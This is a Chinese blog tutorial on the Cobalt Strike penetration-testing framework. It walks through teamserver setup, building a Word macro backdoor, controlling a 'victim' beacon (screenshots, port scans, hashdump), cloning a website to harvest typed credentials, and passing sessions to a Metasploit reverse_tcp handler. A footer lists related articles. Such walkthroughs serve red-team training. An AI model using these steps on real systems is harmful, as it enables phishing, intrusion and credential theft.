Cobal Strike的学习与使用

Cobalt Strike 是一款基于 java 的渗透测试神器,常被业界人称为 CS(全文简称 CS)神 器。3.0 改版后作为一个独立的平台使用。分为客户端与服务端,服务端是一个,客户 端可以有多个,可被团队进行协同操作,共享攻击资源与目标信息和sessions,可模拟 APT 做模拟对抗,进行内网渗透。

——

Cobalt Strike 集成了端口转发、扫描多模式端口 Listener、Windows exe 程序生成、
Windows dll 动态链接库生成、java 程序生成、office 宏代码生成、木马捆绑、钓鱼攻击
等功能。

把下载好的cs文件夹在Linux放一份,Windows放一份。

——
——

Linux服务端设置

团队服务器最好运行在Linux,服务端关键文件 teamserver 和 cobaltstrike.jar
执行teamsever.sh文件,IP为此Linux的IP,123456为后面客户端的连接密码。
回显信息中能够看到给出的连接端口。

./teamserver.sh 192.168.1.1 123456

客户端新建连接,填写作为服务端的IP,还有设置好的密码,给出的端口,用户名随意。
想要连接上,服务端必须想上面一样开着。

——
——

Windows客户端设置

新建监听

配置

在地下可以看到设置好的监听。

———
——

尝试生成后门文件

攻击-生成后门-ms office
这里尝试生成word文件后门

点击选择刚刚创建的监听器

然后弹出这个,点击copy复制代码。

然后新建一个word文件。
点击新建宏,刚刚copy 的内容复制进去。
保存方式后缀启用宏。

点击创建之后,把刚刚copy的代码全部粘贴进去。然后保存即可。

然后另存这个文件,并选择启用宏的word模板。

——
——

受害者上线

当目标打开这个文件的时候,可以看到成功上线。

右键受害机进入beacon会话

执行 cmd 命令需要使用“shell”+执行的命令,其他命令可使用 help
ipconfig,命令 shell ipconfig

受害机屏幕截图

screenshot

执行成功后可看到截图

端口扫描

选择目标–>端口扫描
portscan [ip] 命令

会自动识别目标机所在的内网 ip 段,可选择 ARP,ICMP,none 三种方式进
行扫描,ports 中填入你要扫描的端口

扫描

——

读取用户密码

hashdump

需要administrator权限

——
——

受害机中可关闭进程停止监听。

tasklist 看进程
taskkill /F -pid 19280

——
——

克隆网站测试

设置克隆网站,端口,主机地址默认为服务端的IP,点击克隆即可。

——
设置成功

——
访问

——
然后查看web日志,就可以看到在上面网站中输入的内容了。

——
——

Cobalt Strike 与 与 msf 的联动

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
2.在 Cobalt Strik 中执行,先添加一个监听命令,名称为:msf payload 选择:
windows/foreign/reverse_tcp 监听端口:4444

选择受害者主机,然后右击 Spawn

在 msf 下即可反弹出 meterpreter 会话。

Cobal Strike的学习与使用相关推荐

  1. 网络安全学习:渗透测试钓鱼案例,夯实基础

    简介 请注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的.我将使用Kali Linux作为此次学习的攻击者机器.这里使用的技术仅用于学习教育目的, ...

  2. Cobalt Strike入门使用

    作者:h0we777 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 前言 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS. 0x0 ...

  3. APT组织最喜欢的工具 Cobalt Strike (CS) 实战

    一.Cobalt Strike 背景 Cobalt Strike 在威胁攻击者的恶意活动中的使用次数正在增加.从 2019 年到 2020 年,使用Cobalt Strike 的威胁攻击者增加了 16 ...

  4. CobaltStrike优质学习资源

    0x00 前言 第一部分是关于CobaltStrike优质文章的集合 关于新特性BOF资源的整合 解决要用的时候找不到合适aggressor script或者BOF的问题 如果有本repo没有涉及的优 ...

  5. Cobalt Strike 插件CrossC2(小白教程)

    下载脚本 https://github.com/gloxec/CrossC2/releases 如果在linux上运行Cobal Strike客户端加载脚本就下 genCrossC2.Linux 在w ...

  6. Cobalt Strike基本使用

    Cobalt Strike简介 Cobalt Strike是一款由java编写的全平台多方协同渗透测试框架,在3.0版本之前它基于Metasploit框架工作,在3.0后的版本以独立成一个渗透测试平台 ...

  7. Cobalt Strike使用教程

    0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器.自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端 ...

  8. Cobalt Strike使用教程一

    0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器.自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端 ...

  9. Cobalt Strike笔记(持续更新)

    Cobalt Strike笔记(持续更新) 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器.自3.0以后已经不在使用Metasploit框架而作为一个独立的平 ...

  10. Cobalt Strike折腾踩坑填坑记录

    文章目录 0X00 背景 0x01 基础原理 0x02 关于破戒 Exit暗桩 0x03 CDN+反代隐藏Teamserver Domain Fronting Proxy 0x04 DNS上线 一个未 ...

最新文章

  1. AttributeError: module ‘sys‘ has no attribute ‘maxint‘
  2. REDIS 高可用性部署架构图
  3. 什么是序列化?python pickle模块
  4. Spring Boot 学习笔记(三)Spring boot 中的SSM
  5. 【测试】提交BUG的标准规范
  6. Python面向对象编程 __init__方法
  7. iOS for 和 forin 的区别 以及注意事项
  8. imp-00058: 遇到 oracle 错误 12560,MP-00058: 遇到 ORACLE 错
  9. Android音量设置流程干货版
  10. keepalived详解(一)——keepalived理论基础
  11. 三、Spring Cloud的配置 之 服务提供者 配置
  12. android 查看某一个apk签名,APK提取获取签名
  13. Linux操作系统基础
  14. 31个工作习惯(转)
  15. 百度地图开发-实现离线地图功能 05
  16. win10安装的虚拟机无法连接网络
  17. 华为物联网(IOT)开发者平台
  18. 视频画中画制作,一键合并多个视频,简单又专业
  19. 美团点评CodeM编程大赛-题二
  20. vscode代码格式化、vetur代码格式化取消末尾添加逗号

热门文章

  1. Hadoop集群能打开50070端口网页不能打开8088端口网页
  2. mysql触发器安全吗_猎八哥浅谈MYSQL触发器
  3. html5 swipejs,移动web最简洁的滑动效果Swipe JS(适合初学者)
  4. IQR(Inter-Quartile Range)
  5. 旧服务器显示器回收,服务器回收 下城淘汰电脑显示器回收价钱
  6. 第三(关于set、file、args)
  7. 新手建网站的步骤及注意事项
  8. php7cms手册,phpcms手册下载|
  9. Android报错:Only fullscreen activities can request orientation的解决方法
  10. 软件验收测试合格的标准